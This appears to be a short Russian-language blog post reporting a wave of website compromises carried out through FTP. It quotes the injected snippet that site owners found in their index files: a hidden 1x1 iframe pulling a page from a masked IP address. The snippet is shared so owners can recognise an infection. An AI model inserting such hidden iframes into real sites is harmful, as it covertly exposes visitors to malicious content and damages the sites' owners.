Последние полтора-два месяца в нете обсуждается серия однотипных взломов сайтов через FTP, но никакой конкретной информации по использованной технологии прежде не видел. Заинтересованным лицам советую прочитать вот это. Владельцы взломанных сайтов сообщают, что внедряемый в индексный файл код может иметь такой вид: <iframe width=1 height=1 border=0 frameborder=0 src=http://xxx.xxx.xxx.xxx/index.htm >